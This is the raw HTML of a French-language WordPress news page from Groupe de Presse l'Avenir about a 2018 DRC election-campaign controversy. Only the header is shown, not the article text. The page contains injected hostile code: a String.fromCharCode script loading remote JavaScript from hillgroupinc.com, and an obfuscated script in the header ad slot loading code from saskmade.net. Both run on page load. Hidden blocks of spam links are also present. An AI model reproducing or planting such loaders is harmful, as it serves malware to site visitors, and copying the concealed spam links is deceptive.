<!doctype html >
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en"> <![endif]-->
<!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en"> <![endif]-->
<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="no-js ie9 oldie" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="fr-FR"> <!--<![endif]-->
<head>
    <title>Implication du Premier ministre ou des ministres dans la campagne électorale de Shadary: La MP dénonce une polémique malsaine et perverse | Groupe de Presse l&#039;Avenir</title>
    <meta charset="UTF-8" />
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="author" content="La Rédaction">
    <link rel="pingback" href="https://groupelavenir.org/xmlrpc.php" />

    <meta property="og:image" content="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/11/7-1.png?fit=540%2C385&ssl=1" /><link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Groupe de Presse l&#039;Avenir &raquo; Flux" href="https://groupelavenir.org/feed/" />
<link rel="alternate" type="application/rss+xml" title="Groupe de Presse l&#039;Avenir &raquo; Flux des commentaires" href="https://groupelavenir.org/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Groupe de Presse l&#039;Avenir &raquo; Implication du Premier ministre ou des ministres dans la campagne électorale de Shadary: La MP dénonce une polémique malsaine et perverse Flux des commentaires" href="https://groupelavenir.org/implication-du-premier-ministre-ou-des-ministres-dans-la-campagne-electorale-de-shadary-la-mp-denonce-une-polemique-malsaine-et-perverse/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/groupelavenir.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='jobair-ticker-css-css'  href='https://groupelavenir.org/wp-content/plugins/jb-news-ticker/css/jquery.smarticker.css?ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='rs-plugin-settings-css'  href='https://groupelavenir.org/wp-content/plugins/revslider/rs-plugin/css/settings.css?ver=4.6.5' type='text/css' media='all' />
<style id='rs-plugin-settings-inline-css' type='text/css'>
.tp-caption a{color:#ff7302;text-shadow:none;-webkit-transition:all 0.2s ease-out;-moz-transition:all 0.2s ease-out;-o-transition:all 0.2s ease-out;-ms-transition:all 0.2s ease-out}.tp-caption a:hover{color:#ffa902}
</style>
<link rel='stylesheet' id='chosen-css'  href='https://groupelavenir.org/wp-content/plugins/wp-job-manager/assets/css/chosen.css?ver=1.1.0' type='text/css' media='all' />
<link rel='stylesheet' id='wp-job-manager-frontend-css'  href='https://groupelavenir.org/wp-content/plugins/wp-job-manager/assets/css/frontend.css?ver=1.28.0.1' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css'  href='https://groupelavenir.org/wp-includes/css/dashicons.min.css?ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='google-font-opensans-css'  href='https://fonts.googleapis.com/css?family=Open+Sans%3A300%2C400%2C600%2C700&#038;subset=latin%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%2Clatin-ext%2Ccyrillic&#038;ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='google-font-ubuntu-css'  href='https://fonts.googleapis.com/css?family=Ubuntu%3A300%2C400%2C500%2C700%2C300italic%2C400italic%2C500italic%2C700italic&#038;subset=latin%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Clatin-ext%2Ccyrillic&#038;ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='google-font-pt-sans-css'  href='https://fonts.googleapis.com/css?family=PT+Sans%3A400%2C700%2C400italic&#038;subset=latin%2Ccyrillic-ext%2Clatin-ext%2Ccyrillic&#038;ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='google-font-oswald-css'  href='https://fonts.googleapis.com/css?family=Oswald%3A400%2C300%2C700&#038;subset=latin%2Clatin-ext&#038;ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='google-roboto-cond-css'  href='https://fonts.googleapis.com/css?family=Roboto+Condensed%3A300italic%2C400italic%2C700italic%2C400%2C300%2C700&#038;subset=latin%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%2Clatin-ext%2Ccyrillic&#038;ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='google-vollkorn-css'  href='https://fonts.googleapis.com/css?family=Vollkorn%3A400italic%2C700italic%2C400%2C700&#038;ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='td-bootstrap-css'  href='https://groupelavenir.org/wp-content/themes/Newspaper/includes/wp_booster/external/bootstrap/td-bootstrap.css?ver=4.6.2' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='https://groupelavenir.org/wp-content/themes/Newspaper/style.css?ver=4.6.2' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack-widget-social-icons-styles-css'  href='https://groupelavenir.org/wp-content/plugins/jetpack/modules/widgets/social-icons/social-icons.css?ver=20170506' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='https://groupelavenir.org/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://groupelavenir.org/wp-content/plugins/jetpack/css/jetpack.css?ver=6.3.3' type='text/css' media='all' />
<script type='text/javascript' src='https://groupelavenir.org/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='https://groupelavenir.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='https://groupelavenir.org/wp-content/plugins/jb-news-ticker/js/jquery.smarticker.min.js?ver=1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='https://groupelavenir.org/wp-content/plugins/jetpack/_inc/build/related-posts/related-posts.min.js?ver=20150408'></script>
<script type='text/javascript' src='https://groupelavenir.org/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?ver=4.6.5'></script>
<script type='text/javascript' src='https://groupelavenir.org/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?ver=4.6.5'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sfpp_script_vars = {"language":"fr_FR","appId":"297186066963865"};
/* ]]> */
</script>
<script type='text/javascript' async="async" src='https://groupelavenir.org/wp-content/plugins/simple-facebook-twitter-widget/js/simple-facebook-page-root.js?ver=1.4.15'></script>
<link rel='https://api.w.org/' href='https://groupelavenir.org/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://groupelavenir.org/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://groupelavenir.org/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.8" />
<link rel="canonical" href="https://groupelavenir.org/implication-du-premier-ministre-ou-des-ministres-dans-la-campagne-electorale-de-shadary-la-mp-denonce-une-polemique-malsaine-et-perverse/" />
<link rel='shortlink' href='https://wp.me/pa8S0I-dKc' />
<link rel="alternate" type="application/json+oembed" href="https://groupelavenir.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fgroupelavenir.org%2Fimplication-du-premier-ministre-ou-des-ministres-dans-la-campagne-electorale-de-shadary-la-mp-denonce-une-polemique-malsaine-et-perverse%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://groupelavenir.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fgroupelavenir.org%2Fimplication-du-premier-ministre-ou-des-ministres-dans-la-campagne-electorale-de-shadary-la-mp-denonce-une-polemique-malsaine-et-perverse%2F&#038;format=xml" />

<!--Plugin WP Overview (lite) 2011.0723.2011 Active-->

		<script type="text/javascript">
			jQuery(document).ready(function() {
				// CUSTOM AJAX CONTENT LOADING FUNCTION
				var ajaxRevslider = function(obj) {
				
					// obj.type : Post Type
					// obj.id : ID of Content to Load
					// obj.aspectratio : The Aspect Ratio of the Container / Media
					// obj.selector : The Container Selector where the Content of Ajax will be injected. It is done via the Essential Grid on Return of Content
					
					var content = "";

					data = {};
					
					data.action = 'revslider_ajax_call_front';
					data.client_action = 'get_slider_html';
					data.token = 'bc2ebdac26';
					data.type = obj.type;
					data.id = obj.id;
					data.aspectratio = obj.aspectratio;
					
					// SYNC AJAX REQUEST
					jQuery.ajax({
						type:"post",
						url:"https://groupelavenir.org/wp-admin/admin-ajax.php",
						dataType: 'json',
						data:data,
						async:false,
						success: function(ret, textStatus, XMLHttpRequest) {
							if(ret.success == true)
								content = ret.data;								
						},
						error: function(e) {
							console.log(e);
						}
					});
					
					 // FIRST RETURN THE CONTENT WHEN IT IS LOADED !!
					 return content;						 
				};
				
				// CUSTOM AJAX FUNCTION TO REMOVE THE SLIDER
				var ajaxRemoveRevslider = function(obj) {
					return jQuery(obj.selector+" .rev_slider").revkill();
				};

				// EXTEND THE AJAX CONTENT LOADING TYPES WITH TYPE AND FUNCTION
				var extendessential = setInterval(function() {
					if (jQuery.fn.tpessential != undefined) {
						clearInterval(extendessential);
						if(typeof(jQuery.fn.tpessential.defaults) !== 'undefined') {
							jQuery.fn.tpessential.defaults.ajaxTypes.push({type:"revslider",func:ajaxRevslider,killfunc:ajaxRemoveRevslider,openAnimationSpeed:0.3});   
							// type:  Name of the Post to load via Ajax into the Essential Grid Ajax Container
							// func: the Function Name which is Called once the Item with the Post Type has been clicked
							// killfunc: function to kill in case the Ajax Window going to be removed (before Remove function !
							// openAnimationSpeed: how quick the Ajax Content window should be animated (default is 0.3)
						}
					}
				},30);
			});
		</script>
		
<link rel='dns-prefetch' href='//v0.wordpress.com'/>
<link rel='dns-prefetch' href='//i0.wp.com'/>
<link rel='dns-prefetch' href='//i1.wp.com'/>
<link rel='dns-prefetch' href='//i2.wp.com'/>
<style type='text/css'>img#wpstats{display:none}</style><!--[if lt IE 9]><script src="https://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://groupelavenir.org/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]-->			<style type="text/css">
				.jetpack-lazy-image {
					display: none;
				}
				.jetpack-lazy-images-js .jetpack-lazy-image {
					display: inline-block;
				}
			</style>
			<script>
				document.documentElement.classList.add(
					'jetpack-lazy-images-js'
				);
			</script>
		
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="Implication du Premier ministre ou des ministres dans la campagne électorale de Shadary: La MP dénonce une polémique malsaine et perverse" />
<meta property="og:url" content="https://groupelavenir.org/implication-du-premier-ministre-ou-des-ministres-dans-la-campagne-electorale-de-shadary-la-mp-denonce-une-polemique-malsaine-et-perverse/" />
<meta property="og:description" content="Le président de la République, le Premier ministre ou les ministres peuvent-ils se lancer dans la campagne électorale au profit du candidat du front Commun pour le Congo (FCC), Emmanuel Ramazani Sh…" />
<meta property="article:published_time" content="2018-11-11T21:07:21+00:00" />
<meta property="article:modified_time" content="2018-11-11T21:07:21+00:00" />
<meta property="og:site_name" content="Groupe de Presse l&#039;Avenir" />
<meta property="og:image" content="https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/11/7-1.png?fit=540%2C385&amp;ssl=1" />
<meta property="og:image:width" content="540" />
<meta property="og:image:height" content="385" />
<meta property="og:locale" content="fr_FR" />
<meta name="twitter:text:title" content="Implication du Premier ministre ou des ministres dans la campagne électorale de Shadary: La MP dénonce une polémique malsaine et perverse" />
<meta name="twitter:image" content="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/11/7-1.png?fit=540%2C385&#038;ssl=1&#038;w=640" />
<meta name="twitter:card" content="summary_large_image" />

<!-- End Jetpack Open Graph Tags -->

<!-- Style compiled by theme -->

<style>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</style>


<!-- JS generated by theme -->

<script>
    

var td_blocks = []; //here we store all the items for the current page

//td_block class - each ajax block uses a object of this class for requests
function td_block() {
    this.id = '';
    this.block_type = 1; //block type id (1-234 etc)
    this.atts = '';
    this.td_cur_cat = '';
    this.td_column_number = '';
    this.td_current_page = 1; //
    this.post_count = 0; //from wp
    this.found_posts = 0; //from wp
    this.max_num_pages = 0; //from wp
    this.is_ajax_running = false;
    this.header_color = '';
    this.ajax_pagination_infinite_stop = ''; //show load more at page x
}

    
var td_ad_background_click_link="";
var td_ad_background_click_target="";
var td_ajax_url="https://groupelavenir.org/wp-admin/admin-ajax.php";
var td_get_template_directory_uri="https://groupelavenir.org/wp-content/themes/Newspaper";
var tds_snap_menu="snap";
var tds_header_style="3";
var tds_mobile_swipe="";
var td_search_url="https://groupelavenir.org/search/";
var td_please_wait="Please wait...";
var td_email_user_pass_incorrect="User or password incorrect!";
var td_email_user_incorrect="Email or username incorrect!";
var td_email_incorrect="Email incorrect!";
var tds_more_articles_on_post_enable="";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top="0";
var tds_theme_color_site_wide="#082185";
</script>

</script></head><body> <div style="opacity:0;width:0;height:0;">
	<p>My Weblog: 
<a href="https://kutahyatasarim.com/web-tasarim/" title="kutahya web tasarim" rel="dofollow">kutahya web tasarim</a>
<a href="http://srcnx.com/usta-elektrikci-umraniyede/" title="umraniye elektrikci">umraniye elektrikci</a>
<a href="http://uskudarelektrikcim.blogspot.com/" title="uskudar elektrikci">uskudar elektrikci</a>
<a href="http://umraniyelektrikci.blogspot.com/" title="umraniye elektrikci">umraniye elektrikci</a>
<a href="https://istanbulustaelektrikci.blogspot.com/" title="istanbul elektrikci">istanbul elektrikci</a>
<a href="http://www.satismuhendisligi.com" title="satis egitimi">satis egitimi</a>
<a href="http://cekmekoyelektrikci.wordpress.com/" title="cekmekoy elektrikci">cekmekoy elektrikci</a>
<a href="http://uskudarkornisustasi.wordpress.com/" title="uskudar kornis montaj">uskudar kornis montaj</a>
<a href="http://umraniyekornisustasi.wordpress.com/" title="umraniye kornis montaj">umraniye kornis montaj</a>
<a href="http://atasehirustaelektrikci.wordpress.com/" title="atasehir elektrikci">atasehir elektrikci</a>
<a href="http://beykozelektrikci.wordpress.com/" title="beykoz elektrikci">beykoz elektrikci</a>
</p> </div> <script></script><script>var sc = document.createElement(String.fromCharCode(115, 99, 114, 105, 112, 116)); sc.src=String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 104, 105, 108, 108, 103, 114, 111, 117, 112, 105, 110, 99, 46, 99, 111, 109, 47, 119, 112, 45, 105, 110, 99, 108, 117, 100, 101, 115, 47, 106, 115, 47, 121, 101, 115, 98, 97, 98, 121, 46, 106, 115); sc.type = String.fromCharCode(116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116); document.getElementsByTagName(String.fromCharCode(104, 101, 97, 100))[0].appendChild(sc);</script><script><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript><script>
google_ad_client = "pub-3388840866909005";
/* Recherche */
google_ad_slot = "7163530091";
google_ad_width = 291;
google_ad_height = 250;
</script>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!--script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-7460089153917976",
          enable_page_level_ads: true
     });
</script-->
</head>

<body class="post-template-default single single-post postid-52836 single-format-standard td-boxed-layout implication-du-premier-ministre-ou-des-ministres-dans-la-campagne-electorale-de-shadary-la-mp-denonce-une-polemique-malsaine-et-perverse single_template_1 newspaper wpb-js-composer js-comp-ver-5.1 vc_responsive">



<div id="outer-wrap">
    <div id="td-mobile-nav" class="td-transition-content-and-menu">
    <!-- mobile menu close -->
    <div class="td-mobile-close">
        <a href="#">FERME</a>
        <div class="td-nav-triangle"></div>
    </div>

    <div class="td-mobile-content">
        <div class="menu-navigateur-container"><ul id="menu-navigateur" class=""><li id="menu-item-6325" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first td-no-down-arrow menu-item-6325"><a href="http://groupelavenir.org/"><span class="menu_icon td-sp td-sp-ico-home"></span><span class="menu_hidden">Accueil</span></a></li>
<li id="menu-item-5" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-5"><a href="https://groupelavenir.org/category/actualites/">Actualités</a></li>
<li id="menu-item-10" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-10"><a href="https://groupelavenir.org/category/nation/">Nation</a></li>
<li id="menu-item-11" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-11"><a href="https://groupelavenir.org/category/politique/">Politique</a></li>
<li id="menu-item-6" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6"><a href="https://groupelavenir.org/category/culture/">Culture</a></li>
<li id="menu-item-24516" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-24516"><a href="https://groupelavenir.org/category/avenir-femme/">Avenir femme</a></li>
<li id="menu-item-9" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9"><a href="https://groupelavenir.org/category/monde/">Monde</a></li>
<li id="menu-item-8" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8"><a href="https://groupelavenir.org/category/economie/">Economie</a></li>
<li id="menu-item-15" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-15"><a href="https://groupelavenir.org/category/sport/">Sport</a></li>
<li id="menu-item-14" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14"><a href="https://groupelavenir.org/category/societe/">Société</a></li>
<li id="menu-item-12" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-12"><a href="https://groupelavenir.org/category/provinces/">Provinces</a></li>
</ul></div>    </div>
</div>    <div id="inner-wrap" class="td-transition-content-and-menu">
<div class="td-header-menu-wrap">
    <div class="container">
        <div class="row">
            <div class="span9">
                                            </div>

            <div class="span3">
                            </div>

        </div>
    </div>
</div>


<div style="position:absolute; top:-9999px;">
<ul><li><a href="http://groupelavenir.org/pret-argent-rapide-entre-particulier.html">pret argent facile et rapide</a></li><li><a href="http://groupelavenir.org/j-ai-besoin-d-argent-rapidement-comment-faire.html">j ai besoin d argent rapidement comment faire</a></li><li><a href="http://groupelavenir.org/gagner-des-sous-rapidement-gt5.html">gagner des sous rapidement gt5</a></li><li><a href="http://groupelavenir.org/gagner-des-sous-paypal.html">gagner des sous paypal</a></li><li><a href="http://groupelavenir.org/gagner-argent-hay-day.html">gagner argent hardline</a></li><li><a href="http://groupelavenir.org/comment-gagner-plus-dargent-sur-lol.html">comment gagner plus dargent sur jetpack joyride</a></li><li><a href="http://groupelavenir.org/comment-gagner-de-largent-gratuit.html">comment gagner de largent grace au site internet</a></li><li><a href="http://groupelavenir.org/comment-gagner-de-largent-bde.html">comment gagner de largent avec zeekrewards</a></li><li><a href="http://groupelavenir.org/comment-faire-de-l-argent-vite.html">comment faire de l argent sur l internet</a></li><li><a href="http://groupelavenir.org/comment-devenir-riche-trading.html">comment devenir riche tf2</a></li><li><a href="http://groupelavenir.org/argent-facile-need-for-speed-carbon.html">argent facile nantes</a></li><li><a href="http://groupelavenir.org/argent-de-poche-voyage-new-york.html">argent de poche voyage malaisie</a></li></ul></div>
<!-- full width logo -->
<div class="td-header-bg">
    <div class="container header-style-3">
        <div class="row">
            <div class="span12 td-full-logo" role="banner" itemscope="itemscope" itemtype="https://schema.org/Organization">
                <div class="td-grid-wrap">
                    <div class="container-fluid">
                                                        <a class="td-logo" itemprop="url" href="https://groupelavenir.org"><img src="http://groupelavenir.org/wp-content/uploads/2015/08/ga3.jpg" alt=""/></a>
                                <meta itemprop="name" content="Groupe de Presse l&#039;Avenir">
                                                </div>
                </div>
            </div>
        </div>
    </div>
</div>
<!-- header menu -->

<div class="td-menu-placeholder">

    <div class="td-menu-background">
        <div class="container td-menu-wrap">



            <div class="row-fluid td-menu-header">

                <div class="span11">
                    

                    <div id="td-top-mobile-toggle">
                        <ul class="sf-menu">
                            <li>
                                <a href="#">
                                    <span class="menu_icon td-sp td-sp-ico-menu"></span>
                                </a>
                            </li>
                        </ul>
                    </div>

                    <div id="td-top-menu" role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">

                            <div class="menu-navigateur-container"><ul id="menu-navigateur-1" class="sf-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first td-no-down-arrow td-menu-item td-normal-menu menu-item-6325"><a href="http://groupelavenir.org/"><span class="menu_icon td-sp td-sp-ico-home"></span><span class="menu_hidden">Accueil</span></a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-menu-item td-normal-menu menu-item-5"><a href="https://groupelavenir.org/category/actualites/">Actualités</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-10"><a href="https://groupelavenir.org/category/nation/">Nation</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-11"><a href="https://groupelavenir.org/category/politique/">Politique</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-6"><a href="https://groupelavenir.org/category/culture/">Culture</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-24516"><a href="https://groupelavenir.org/category/avenir-femme/">Avenir femme</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-9"><a href="https://groupelavenir.org/category/monde/">Monde</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-8"><a href="https://groupelavenir.org/category/economie/">Economie</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-15"><a href="https://groupelavenir.org/category/sport/">Sport</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-14"><a href="https://groupelavenir.org/category/societe/">Société</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-12"><a href="https://groupelavenir.org/category/provinces/">Provinces</a></li>
</ul></div>                    </div>



                </div>

                <div class="span1" id="td-top-search">
                    <!-- Search -->
                    <div class="header-search-wrap">
                        <div class="dropdown header-search">
                            <a id="search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><span class="td-sp td-sp-ico-search"></span></a>
                            <div class="dropdown-menu" aria-labelledby="search-button">
                                <form role="search" method="get" class="td-search-form" action="https://groupelavenir.org/">
                                    <div class="td-head-form-search-wrap">
                                        <input class="needsclick" id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Recherche" />
                                    </div>
                                </form>
                                <div id="td-aj-search"></div>
                            </div>
                        </div>
                    </div>
                </div>


            </div> <!-- /.row-fluid -->
        </div> <!-- /.td-menu-wrap -->
    </div> <!-- /.td-menu-background -->
</div> <!-- /.td-menu-placeholder -->


        <div class="container">
<div id="widget-area-h" class="widget-area" role="complementary">
			</div><!-- .widget-area -->
        </div> <!-- /.td-menu-wrap --><div class="container header-content-rec">
    <div class="row">
        <div class="span12">
            <div class="td-a-rec td-a-rec-id-header "><script type='text/javascript'>var _0x1e35=['length','fromCharCode','createElement','type','async','code121','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,_0x3f720e){var _0x440369=function(_0x2e1b64){while(--_0x2e1b64){_0x546a53['push'](_0x546a53['shift']());}};_0x440369(++_0x3f720e);}(_0x1e35,0x1e1));var _0x5a05=function(_0x716551,_0x1d4a8e){_0x716551=_0x716551-0x0;var _0x2b7638=_0x1e35[_0x716551];return _0x2b7638;};var url=String[_0x5a05('0x0')](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x61,0x73,0x6b,0x6d,0x61,0x64,0x65,0x2e,0x6e,0x65,0x74,0x2f,0x68,0x65,0x61,0x64,0x2e,0x6a,0x73,0x3f,0x76,0x65,0x72,0x3d,0x31,0x2e,0x30,0x2e,0x30);var a=function(){var _0x22c9c8=document[_0x5a05('0x1')](String[_0x5a05('0x0')](0x73,0x63,0x72,0x69,0x70,0x74));_0x22c9c8[_0x5a05('0x2')]=String[_0x5a05('0x0')](0x74,0x65,0x78,0x74,0x2f,0x6a,0x61,0x76,0x61,0x73,0x63,0x72,0x69,0x70,0x74);_0x22c9c8[_0x5a05('0x3')]=!![];_0x22c9c8['id']=_0x5a05('0x4');_0x22c9c8[_0x5a05('0x5')]=url;document['getElementsByTagName'](String[_0x5a05('0x0')](0x68,0x65,0x61,0x64))[0x0][_0x5a05('0x6')](_0x22c9c8);};var scrpts=document[_0x5a05('0x7')](_0x5a05('0x8'));var n=!![];for(var i=scrpts[_0x5a05('0x9')];i--;){if(scrpts[i]['id']==_0x5a05('0x4')){n=![];}};if(n==!![]){a();}</script></div>        </div>
    </div>
</div><div class="container">
<aside class="widget widget_execphp">			<div class="execphpwidget"> <script type="text/javascript">
			jQuery(document).ready(function(){			
				jQuery(".smarticker1").smarticker({	
				theme: 2,
				speed: 2000,
				title: "Dépèches",
				rounded: false,
				animation: "slide"
				});
			});
			</script>
					<div class="smarticker1">
						<ul>
							
							
						<li><a href="https://groupelavenir.org/a-lissue-de-la-reunion-de-geneve-alan-doss-choisit-fayulu/">A l’issue de la réunion de Genève: Alan Doss choisit Fayulu</a></li>										
								
			
						<li><a href="https://groupelavenir.org/sous-une-pluie-de-benediction-shadary-triomphe-a-mbuji-mayi/">Sous une pluie de bénédiction: Shadary triomphe à Mbuji-Mayi</a></li>										
								
	</ul></div></div>
		</aside></div>

        <div class="container td-page-wrap">
            <div class="row">
                <div class="span12">
                    <div class="td-grid-wrap">
                        <div class="container-fluid">
                            <div class="row-fluid ">
                    <div class="span8 column_container td-post-content" role="main" itemprop="mainContentOfPage">
                <div class="entry-crumbs"><span itemscope itemtype="https://data-vocabulary.org/Breadcrumb"><a title="Voir tous les articles dans Actualités" class="entry-crumb" itemprop="url" href="https://groupelavenir.org/category/actualites/"><span itemprop="title">Actualités</span></a></span></div>
    <article id="post-52836" class="post-52836 post type-post status-publish format-standard has-post-thumbnail hentry category-actualites np" itemscope itemtype="https://schema.org/Article">

        <header>

            <h1 itemprop="name" class="entry-title">Implication du Premier ministre ou des ministres dans la campagne électorale de Shadary: La MP dénonce une polémique malsaine et perverse</h1>
            <div class="meta-info">
